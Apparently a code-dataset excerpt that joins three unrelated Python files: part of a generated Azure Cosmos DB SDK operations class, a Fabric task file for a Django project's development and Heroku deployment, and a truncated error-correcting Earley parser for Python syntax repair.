def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_metrics(
self,
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
filter: str,
**kwargs: Any
) -> Iterable["_models.Metric"]:
"""Retrieves the metrics determined by the given filter for the given database account and
collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:param filter: An OData filter expression that describes a subset of metrics to return. The
parameters that can be filtered are name.value (name of the metric, can have an or of multiple
names), startTime, endTime, and timeGrain. The supported operator is eq. Required.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Metric or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.Metric]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.MetricListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_metrics_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
filter=filter,
api_version=api_version,
template_url=self.list_metrics.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MetricListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_metrics.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metrics"} # type: ignore
@distributed_trace
def list_usages(
self,
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
filter: Optional[str] = None,
**kwargs: Any
) -> Iterable["_models.Usage"]:
"""Retrieves the usages (most recent storage data) for the given collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:param filter: An OData filter expression that describes a subset of usages to return. The
supported parameter is name.value (name of the metric, can have an or of multiple names).
Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Usage or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.Usage]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.UsagesResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_usages_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
filter=filter,
api_version=api_version,
template_url=self.list_usages.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsagesResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_usages.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/usages"} # type: ignore
@distributed_trace
def list_metric_definitions(
self, resource_group_name: str, account_name: str, database_rid: str, collection_rid: str, **kwargs: Any
) -> Iterable["_models.MetricDefinition"]:
"""Retrieves metric definitions for the given collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricDefinition or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.MetricDefinition]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.MetricDefinitionsListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_metric_definitions_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_metric_definitions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MetricDefinitionsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_metric_definitions.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metricDefinitions"} # type: ignore
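# Illustrative usage sketch (all resource identifiers below are placeholders):
# as the class docstring notes, these operations are reached through the
# management client's `collection` attribute rather than by instantiating
# CollectionOperations directly, e.g.
#
#   client = CosmosDBManagementClient(credential, "<subscription-id>")
#   for metric in client.collection.list_metrics(
#           "<resource-group>", "<account>", "<database-rid>",
#           "<collection-rid>", filter="<odata-filter>"):
#       print(metric.name)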
| [
"[email protected]"
] | |
751cf05a4a081982c332d1d32c6bfbd742ac75f9 | 40ca01569e9c8ed6d2312447fac604229bdeace3 | /fabfile.py | bb0342de308a2dc2d08064b855fa24d83163edb7 | [
"MIT"
] | permissive | deniskrumko/izyan-poker | c393c9c4cb401d3180a97075fde59ff2e371a77d | ce70c9c8f761409adad289809e5220237b312407 | refs/heads/master | 2021-06-14T08:59:03.364660 | 2020-02-11T06:48:00 | 2020-02-11T06:48:00 | 200,377,031 | 7 | 2 | MIT | 2021-06-10T18:43:43 | 2019-08-03T13:11:06 | Python | UTF-8 | Python | true | false | 3,424 | py | from fabric.api import task, local
def print_msg(msg, error=False):
"""Print message in console."""
def green_msg(msg):
"""Make message green color in console."""
return '\033[92m{0}\033[00m'.format(msg)
def red_msg(msg):
"""Make message red color in console."""
return '\033[91m{0}\033[00m'.format(msg)
print_function = red_msg if error else green_msg
print(print_function('\n{}\n'.format(msg)))
# MAIN COMMANDS
# ============================================================================
@task
def manage(command):
"""Run ``python3 manage.py`` command."""
return local('python3 manage.py {}'.format(command))
@task
def run():
"""Run server."""
return manage('runserver')
@task
def shell():
"""Run server."""
return manage('shell_plus')
# GIT
# ============================================================================
@task
def push(force=False):
"""Push changes to all servers."""
force = ' --force' if force else ''
print_msg('1. Pushing to origin')
local(f'git push origin master --tags{force}')
print_msg('2. Pushing to Heroku')
local(f'git push heroku master{force}')
# LOCALES
# ============================================================================
@task
def makemessages():
"""Make messages."""
return manage('makemessages -l ru --no-location')
@task
def compilemessages():
"""Compile messages."""
return manage('compilemessages')
# MIGRATIONS AND DATABASE
# ============================================================================
@task
def makemigrations():
"""Make migrations for database."""
manage('makemigrations')
@task
def migrate():
"""Apply migrations to database."""
print_msg('Applying migrations')
manage('migrate')
@task
def createsuperuser(email='[email protected]'):
"""Create superuser with default credentials."""
print_msg('Creating superuser')
return manage('createsuperuser --username root --email {}'.format(email))
@task
def resetdb():
"""Reset database to initial state."""
print_msg('Remove "scr/media" folder')
local('rm -rf media/')
print_msg('Reset database')
manage('reset_db -c --noinput')
migrate()
createsuperuser()
# STATIC CHECKS: ISORT AND PEP8
# ============================================================================
@task
def isort():
"""Fix imports formatting."""
print_msg('Running imports fix')
local('isort apps config -y -rc')
@task
def pep8(path='apps core'):
"""Check PEP8 errors."""
print_msg('Checking PEP8 errors')
return local('flake8 --config=.flake8 {}'.format(path))
# PIPENV
# ============================================================================
@task
def lock():
"""Lock requirements."""
print_msg('Locking requirements')
local('pipenv lock')
@task
def install():
"""Install requirements."""
print_msg('Installing DEV requirements')
local('pipenv install --dev')
# HEROKU
# ============================================================================
@task
def logs():
local('heroku logs --source app --tail')
@task
def scale(value=1):
local(f'heroku ps:scale web={value}')
@task
def ps():
local(f'heroku ps')
@task
def runweb():
local(f'heroku local web -f Procfile.local')
@task
def python(command):
local(f'heroku run python {command}')
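# Illustrative note (assuming the Fabric 1.x CLI implied by the fabric.api
# import): these tasks are invoked from the command line, e.g.
#   fab run
#   fab push:force=True
#   fab pep8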
| [
"[email protected]"
] | |
576b6d9babf5c6a9873f3626e654acd855eb9a57 | e547f7a92e7a1c1d79f8631f9e8ee8a93879a4eb | /src/ecpp_individual_grammar_all_states.py | b9efc69d0dd8291e782f6fe9c3c66b6e7bc673e7 | [] | no_license | gsakkas/seq2parse | 3c33ec7bc6cc6e4abd9e4981e53efdc173b7a7b9 | 7ae0681f1139cb873868727f035c1b7a369c3eb9 | refs/heads/main | 2023-04-09T12:29:37.902066 | 2023-01-18T21:32:12 | 2023-01-18T21:32:12 | 417,597,310 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 58,203 | py | """
Error Correcting Python Earley Parser.
@author: Georgios Sakkas, Earley Parser based on Hardik's implementation
"""
import argparse
import re
# from ast import parse
from pathlib import Path
from collections import defaultdict, deque
from itertools import product
from nltk.tree import Tree
from functools import partial
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.token import Text, Name, Number, String, Punctuation, Operator, Keyword
class Rule():
"""
Represents a CFG rule.
"""
def __init__(self, lhs, rhs):
# Represents the rule 'lhs -> rhs', where lhs is a non-terminal and
# rhs is a list of non-terminals and terminals.
self.lhs, self.rhs = lhs, rhs
def __contains__(self, sym):
return sym in self.rhs
def __eq__(self, other):
if isinstance(other, (Rule, ErrorRule)):
return self.lhs == other.lhs and self.rhs == other.rhs
return False
def __hash__(self):
return hash((" ".join(self.lhs), " ".join(self.rhs)))
def __getitem__(self, i):
return self.rhs[i]
def __len__(self):
return len(self.rhs)
def __repr__(self):
return self.__str__()
def __str__(self):
return self.lhs + ' -> ' + ' '.join(self.rhs)
def error_score(self):
return 0
class ErrorRule(Rule):
def error_score(self):
if self.lhs in ['Err_Dedent', 'Err_Indent', 'Err_Close_Paren', 'Err_Open_Paren']:
return 0.5
return 1
class Grammar():
"""
Represents a CFG.
"""
def __init__(self):
# The rules are represented as a dictionary from L.H.S to R.H.S.
self.rules = defaultdict(list)
def add(self, rule):
"""
Adds the given rule to the grammar.
"""
if rule not in self.rules[rule.lhs]:
self.rules[rule.lhs].append(rule)
def get_alphabet(self):
symbols = set([])
alphabet = set([])
for key in self.rules:
for rule in self.rules[key]:
for sym in rule.rhs:
symbols.add(sym)
for sym in symbols:
if self.is_terminal(sym):
if sym not in alphabet:
alphabet.add(sym)
return alphabet
def get_tags(self):
symbols = set([])
tags = set([])
for key in self.rules:
for rule in self.rules[key]:
for sym in rule.rhs:
symbols.add(sym)
for sym in symbols:
if self.is_tag(sym):
if sym not in tags:
tags.add(sym)
return tags
@staticmethod
def load_grammar(fpath):
"""
Loads the grammar from the given file path.
"""
grammar = Grammar()
with open(fpath) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
entries = line.split('->')
lhs = entries[0].strip()
for rhs in entries[1].split('<|>'):
grammar.add(Rule(lhs, rhs.strip().split()))
return grammar
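# Illustrative note (the productions below are made up for the example, not
# taken from the shipped grammar file): load_grammar expects one production
# per line, with '->' separating the left-hand side from the right-hand side
# and '<|>' separating alternative right-hand sides, e.g.
#
#   Stmt -> Simple_Stmt _NEWLINE_ <|> Compound_Stmt
#   Simple_Stmt -> Expr_Stmt <|> Return_Stmt
#
# Symbols inside a right-hand side are whitespace-separated.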
def __repr__(self):
return self.__str__()
def __str__(self):
s = [str(r) for r in self.rules['S']]
for nt, rule_list in self.rules.items():
if nt == 'S':
continue
s += [str(r) for r in rule_list]
return '\n'.join(s)
# Returns the rules for a given Non-terminal.
def __getitem__(self, nt):
return self.rules[nt]
def is_terminal(self, sym):
"""
Checks if the given symbol is terminal.
"""
return len(self.rules[sym]) == 0
def is_tag(self, sym):
"""
Checks whether the given symbol is a tag, i.e. a non-terminal with rules
to solely terminals.
"""
if not self.is_terminal(sym):
return all(self.is_terminal(s) for r in self.rules[sym] for s in
r.rhs)
return False
def is_nullable(self, sym):
"""
Checks whether the given symbol is nullable, i.e. a non-terminal with rules
to null.
"""
if not self.is_terminal(sym):
return any(r.rhs==[] for r in self.rules[sym])
class ErrorGrammar(Grammar):
@staticmethod
def load_grammar(fpath):
"""
Loads the grammar from the given file path.
"""
grammar = ErrorGrammar()
with open(fpath) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
entries = line.split('->')
lhs = entries[0].strip()
for rhs in entries[1].split('<|>'):
rhssymbols = rhs.strip().split()
grammar.add(Rule(lhs, rhssymbols))
return grammar
def update_error_grammar(self, changes):
# print(len(str(self).split('\n')))
alphabet = self.get_alphabet()
tags = self.get_tags()
alphabet.remove('_ENDMARKER_')
#second step
all_important_tags = []
for ch in changes:
important_terminals = ch[1].split() if ch[1] is not None else []
# important_terminals += ch[2].split() if ch[2] is not None else []
important_tags = []
for tag in tags:
if ch[2] is not None:
for tok in ch[2].split():
if any([(tok in rule) for rule in self.rules[tag]]):
important_tags.append(tag)
important_tags = list(set(important_tags))
if ch[0] == 'deleted':
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(Rule("Err_" + sym, ["H", sym]))
# self.add(ErrorRule("Err_" + sym, ["InsertErr", sym]))
all_important_tags.append(sym)
for sym in important_terminals:
self.add(ErrorRule("InsertErr", [sym]))
elif ch[0] == 'added':
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(ErrorRule("Err_" + sym, ["Err_Tag"]))
all_important_tags.append(sym)
self.add(ErrorRule("Err_" + sym, []))
else:
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(ErrorRule("Err_" + sym, ["Err_Tag"]))
self.add(Rule("Err_" + sym, ["H", sym]))
all_important_tags.append(sym)
self.add(ErrorRule("Err_" + sym, []))
for sym in important_terminals:
self.add(ErrorRule("Err_Tag", [sym]))
self.add(ErrorRule("InsertErr", [sym]))
all_important_tags = list(set(all_important_tags))
#first step in Algorithm 1 in AHO's paper
added_rules_1 = []
for key in self.rules:
if not key.startswith('Err_') and not key.startswith('InsertErr'):
for rule in self.rules[key]:
if rule.error_score() < 1:
new_rules_1 = ErrorGrammar.error_rule_1(self, rule, all_important_tags)
if new_rules_1:
added_rules_1.extend(new_rules_1)
for rule in added_rules_1:
self.add(rule)
# print('++++++++++++++++++++++++++')
# for key in self.rules:
# for rule in self.rules[key]:
# if rule.error_score() > 0:
# print(rule)
# print('++++++++++++++++++++++++++')
#third step
self.add(Rule("S'", ["S"]))
self.add(Rule("S'", ["S", "InsertErr"]))
self.add(Rule("H", ["H", "InsertErr"]))
self.add(Rule("H", ["InsertErr"]))
# print(self)
# print(len(str(self).split('\n')))
error_rules = [r for k in self.rules for r in self.rules[k]]
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', error_rules))
return error_rules
@staticmethod
def error_rule_1(grammar, rule, itags):
if grammar.is_tag(rule.lhs):
return []
new_rules_rhs = []
flag = False
for sym in rule.rhs:
if not grammar.is_tag(sym):
# if not grammar.is_tag(sym) or sym in ['Endmarker']:
new_rules_rhs.append([sym])
elif sym in itags:
new_rules_rhs.append(["Err_" + sym, sym])
flag = True
else:
new_rules_rhs.append([sym])
new_rules = []
for rule_rhs in product(*new_rules_rhs):
if list(rule_rhs) != rule.rhs:
new_rules.append(Rule(rule.lhs, list(rule_rhs)))
return new_rules
@staticmethod
def error_rule_0(grammar, rule, itags):
if rule.lhs in ['Annotated_Assign']:
return []
if grammar.is_tag(rule.lhs):
return []
new_rules_rhs = []
flag = False
for sym in rule.rhs:
if not grammar.is_tag(sym):
# if not grammar.is_tag(sym) or sym in ['Endmarker']:
new_rules_rhs.append([sym])
elif sym in itags:
new_rules_rhs.append(["Err_" + sym, sym])
flag = True
else:
new_rules_rhs.append([sym])
new_rules = []
for rule_rhs in product(*new_rules_rhs):
if list(rule_rhs) != rule.rhs:
new_rules.append(Rule(rule.lhs, list(rule_rhs)))
return new_rules
def update_error_grammar_with_erules(self, erules):
# print(len(str(self).split('\n')))
alphabet = self.get_alphabet()
tags = self.get_tags()
alphabet.remove('_ENDMARKER_')
# Maybe remove "Tfpdef -> Vfpdef Err_Colon Test" typed definitions in the future
#second step
all_important_tags = []
for erl in erules:
entries = erl.split('->')
lhs = entries[0].strip()
if 'H ' in entries[1]:
self.add(Rule(lhs, entries[1].strip().split()))
else:
self.add(ErrorRule(lhs, entries[1].strip().split()))
if lhs.startswith('Err_'):
sym = lhs.replace('Err_', '')
all_important_tags.append(sym)
all_important_tags = list(set(all_important_tags))
#first step in Algorithm 1 in AHO's paper
added_rules_1 = []
for key in self.rules:
if not key.startswith('Err_') and not key.startswith('InsertErr'):
for rule in self.rules[key]:
if rule.error_score() < 1:
new_rules_0 = ErrorGrammar.error_rule_0(self, rule, all_important_tags)
if new_rules_0:
added_rules_1.extend(new_rules_0)
for rule in added_rules_1:
self.add(rule)
# print('++++++++++++++++++++++++++')
# num_of_erules = 0
# for key in self.rules:
# for rule in self.rules[key]:
# if rule.error_score() > 0:
# print(rule)
# num_of_erules += 1
# print(num_of_erules)
# print('++++++++++++++++++++++++++')
#third step
self.add(Rule("S'", ["S"]))
self.add(Rule("S'", ["S", "InsertErr"]))
self.add(Rule("H", ["H", "InsertErr"]))
self.add(Rule("H", ["InsertErr"]))
# print(self)
# print(len(str(self).split('\n')))
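# Illustrative note (the concrete strings below are invented examples):
# update_error_grammar_with_erules expects error rules serialized in the same
# "Lhs -> Rhs" text form used throughout this module, e.g.
#
#   "Err_Colon -> Err_Tag"   # the ':' position may hold a different terminal
#   "Err_Colon -> H Colon"   # extra tokens allowed before a ':'
#   "InsertErr -> ="         # '=' can be treated as an extra token
#
# Right-hand sides containing 'H ' are added as zero-cost Rules, everything
# else as ErrorRules, mirroring the check at the top of the method.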
class State():
"""
Represents a state in the error-correcting Earley algorithm.
"""
GAM = '<GAM>'
def __init__(self, rule, dot=0, sent_pos=0, chart_pos=0, error_count=0, back_pointers=[]):
# CFG Rule.
self.rule = rule
# Dot position in the rule.
self.dot = dot
# Sentence position.
self.sent_pos = sent_pos
# Chart index.
self.chart_pos = chart_pos
# Error counter
self.error_count = error_count
# Pointers to child states (if the given state was generated using
# Completer).
self.back_pointers = back_pointers
# Hash for the back_pointers for efficient usage
self.own_hash = hash((self.rule, self.dot, self.sent_pos, self.error_count)) + \
hash(", ".join(str(hash(s)) for s in back_pointers) if back_pointers else hash("empty"))
def __eq__(self, other):
if isinstance(other, State):
return self.rule == other.rule and self.dot == other.dot and \
self.sent_pos == other.sent_pos and self.error_count == other.error_count and \
self.own_hash == other.own_hash
return False
def __hash__(self):
return self.own_hash
def __len__(self):
return len(self.rule)
def __repr__(self):
return self.__str__()
def __str__(self):
def str_helper(state):
return ('(' + state.rule.lhs + ' -> ' +
' '.join(state.rule.rhs[:state.dot] + ['*'] +
state.rule.rhs[state.dot:]) +
(', [%d, %d], %d)' % (state.sent_pos, state.chart_pos, state.error_count)))
return (str_helper(self) +
' (' + ', '.join(str_helper(s) for s in self.back_pointers) + ')')
def next(self):
"""
Return next symbol to parse, i.e. the one after the dot
"""
if self.dot < len(self):
return self.rule[self.dot]
def is_complete(self):
"""
Checks whether the given state is complete.
"""
return len(self) == self.dot
@staticmethod
def init():
"""
Returns the state used to initialize the chart in the Earley algorithm.
"""
return State(Rule(State.GAM, ["S'"]))
class ChartEntry():
"""
Represents an entry in the chart used by the Earley algorithm.
"""
def __init__(self, states):
# List of Earley states.
self.states = deque(states)
self.seen = dict([])
def __iter__(self):
return iter(list(self.states) + list(self.seen.keys()))
def __len__(self):
return len(self.states) + len(self.seen.keys())
def __repr__(self):
return self.__str__()
def __str__(self):
return '\n'.join(str(s) for s in list(self.states) + list(self.seen.keys()))
def pop_state(self, cost):
"""
Return the next unseen state
"""
while len(self.states) > 0:
state = self.states.popleft()
if state.error_count <= cost:
if state not in self.seen:
self.seen[state] = state.error_count
return state
return None
def add(self, grammar, state):
"""
Add the given state (if it hasn't already been added).
"""
if state not in self.states and state not in self.seen:
if state.is_complete() and grammar.is_nullable(state.rule.lhs):
self.states.append(state)
else:
self.states.appendleft(state)
class Chart():
"""
Represents the chart used in the Earley algorithm.
"""
def __init__(self, entries):
# List of chart entries.
self.entries = entries
def __getitem__(self, i):
return self.entries[i]
def __len__(self):
return len(self.entries)
def __repr__(self):
return self.__str__()
def __str__(self):
return '\n\n'.join([("Chart[%d]:\n" % i) + str(entry) for i, entry in
enumerate(self.entries)])
@staticmethod
def init(l):
"""
Initializes a chart with l entries (Including the dummy start state).
"""
return Chart([(ChartEntry([]) if i > 0 else
ChartEntry([State.init()])) for i in range(l)])
class ErrorEarleyParse():
"""
Represents the Error-correcting Earley-generated parse for a given sentence according to a
given grammar.
"""
def __init__(self, sentence, grammar, max_cost=3):
self.words = sentence.split()
self.grammar = grammar
self.chart = Chart.init(len(self.words) + 1)
# Maximum number of error correcting rules to use
self.max_cost = max_cost
def predictor(self, state, pos):
"""
Error-correcting Earley Predictor.
"""
# runs = 0
for rule in self.grammar[state.next()]:
# This is my optimization to avoid using that many ErrorRules
self.chart[pos].add(self.grammar, State(rule, dot=0,
sent_pos=state.chart_pos, chart_pos=state.chart_pos))
# runs += 1
# print("===================")
# print("<<Predictor>>")
# print("Chart[" + str(pos) + "]")
# print(self.chart[pos])
# print(">>>", state)
# print("===================")
# return runs
def scanner(self, state, pos):
"""
Error-correcting Earley Scanner.
"""
# runs = 1
if state.chart_pos < len(self.words):
word = self.words[state.chart_pos]
# runs = ([(word in r) for r in self.grammar[state.next()]] + [True]).index(True)
if any((word in r) for r in self.grammar[state.next()]):
new_cost = 1 if state.next().startswith('Err_') or state.next() == 'InsertErr' else 0
if new_cost <= self.max_cost:
self.chart[pos + 1].add(self.grammar, State(Rule(state.next(), [word]),
dot=1, sent_pos=state.chart_pos,
chart_pos=(state.chart_pos + 1),
error_count=new_cost))
# print("===================")
# print("<<Scanner>>")
# print("Chart[" + str(pos+1) + "]")
# print(self.chart[pos+1])
# print(">>>", state)
# print("===================")
# return runs
def completer(self, state, pos):
"""
Error-correcting Earley Completer.
"""
# runs = 0
# print("===================")
# print("<<Completer>>")
# print(">>>", state)
for prev_state in self.chart[state.sent_pos]:
if prev_state.next() == state.rule.lhs:
new_cost = prev_state.error_count + state.error_count + state.rule.error_score()
if state.rule.lhs == 'Err_Tag':
if state.rule.rhs == []:
new_cost = 1
elif any((state.rule.rhs[0] in r) for r in self.grammar[prev_state.rule.lhs.replace('Err_', '')]):
new_cost = prev_state.error_count
if new_cost <= self.max_cost:
self.chart[pos].add(self.grammar, State(prev_state.rule,
dot=(prev_state.dot + 1), sent_pos=prev_state.sent_pos,
chart_pos=pos,
back_pointers=(prev_state.back_pointers + [state]),
error_count=new_cost))
# runs += 1
# print("Chart[" + str(pos) + "]")
# print(self.chart[pos])
# print("===================")
# return runs
def parse(self):
"""
Parses the sentence by running the Earley algorithm and filling out the
chart.
"""
# Checks whether the next symbol for the given state is a tag.
def is_tag(state):
return self.grammar.is_tag(state.next())
for i in range(len(self.chart)):
# print("Chart[" + str(i) + "]")
# print(len(self.chart[i]))
# jj = 0
# print("===================")
state = self.chart[i].pop_state(self.max_cost)
while state is not None:
# print(">>>", state)
# print("===================")
# jj += 1
if not state.is_complete():
if is_tag(state) and not self.grammar.is_nullable(state.next()):
self.scanner(state, i)
else:
self.predictor(state, i)
# if state.next().startswith('Err_'):
# print(state)
# if self.grammar.is_nullable(state.next()):
# print("FUCCKYEAH", state)
# self.completer(state, i)
# self.chart[i].add_other_states(state)
else:
self.completer(state, i)
state = self.chart[i].pop_state(self.max_cost)
# print("YOOO!", state, state == None)
# print(jj)
# print(self.chart[i])
# print(len(self.chart[i]))
# break
# if self.get_parses() > 1:
# print("Cost =", cost)
# break
# for i in range(len(self.chart)):
# print("Chart[" + str(i) + "]")
# # print("===================")
# print(len(self.chart[i]))
# print(self.chart[i])
# # print("Cost =", cost)
# print(self.chart)
def has_parse(self):
"""
Checks whether the sentence has a parse.
"""
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
return True
return False
def get_parses(self):
"""
Returns the number of complete parses of the sentence.
"""
num_of_parses = 0
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
num_of_parses += 1
return num_of_parses
def get(self):
"""
Returns the minimum error parse if it exists, otherwise returns None.
"""
def get_helper(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs):
if state.rule.rhs != []:
return Tree(state.rule.lhs, [state.rule.rhs[0]])
return Tree(state.rule.lhs, [state.rule.lhs.replace('Err_', '')])
return Tree(state.rule.lhs,
[get_helper(s) for s in state.back_pointers])
found_state = None
errors = float("inf")
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
if state.error_count < errors:
# get_helper(state).pretty_print()
# print(state.error_count)
found_state = state
errors = state.error_count
if found_state is not None:
return get_helper(found_state)
return None
def get_rules(self):
"""
Returns the list of grammar rules used by the minimum error parse if it exists, otherwise returns None.
"""
def get_helper(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs):
return [state.rule]
result = [state.rule]
for s in state.back_pointers:
result.extend(get_helper(s))
return result
found_state = None
errors = float("inf")
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
if state.error_count < errors:
found_state = state
errors = state.error_count
if found_state is not None:
return get_helper(found_state)
return None
def get_fixed_seq(self):
"""
Returns the candidate repaired sequences (with their error rules and costs), sorted by cost, if any exist, otherwise returns None.
"""
def get_helperrr(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs) or \
(self.grammar.is_tag(state.rule.lhs.replace('Err_', '')) and \
